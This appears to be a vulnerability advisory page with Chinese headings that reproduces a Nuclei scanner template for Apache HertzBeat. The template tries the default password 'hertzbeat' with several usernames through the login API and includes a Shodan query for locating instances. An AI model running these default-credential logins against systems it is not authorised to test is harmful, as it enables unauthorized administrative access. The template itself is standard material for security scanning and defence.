漏洞描述
Apache HertzBeat enables default admin (and others) credentials. An attacker can execute unauthorized operations.
apache-hertzbeat-default-login: Apache HertzBeat - Default Credentials
PoC代码[已公开]
id: apache-hertzbeat-default-login
info:
name: Apache HertzBeat - Default Credentials
author: securitytaters,icarot
severity: high
description: |
Apache HertzBeat enables default admin (and others) credentials. An attacker can execute unauthorized operations.
reference:
- https://github.com/apache/hertzbeat
metadata:
max-request: 4
verified: true
shodan-query: title:"HertzBeat"
tags: apache,hertzbeat,default-login,vuln
variables:
password: hertzbeat
http:
- raw:
- |
POST /api/account/auth/form HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"type":0,"identifier":"{{username}}","credential":"{{password}}"}
attack: pitchfork
payloads:
username:
- admin
- tom
- guest
- lili
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"token":'
- '{"data":{'
- 'role":'
condition: and
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4a0a00473045022100f6c2ac46d9f094cc709a5c178d8919ea652026a9624cfcf326e6a175e32889b70220138a4cd4f234b5cc6ef47cb953ab485ce6828de0682ab55ced3762796298fb76:922c64590222798bb761d5b6d8e72950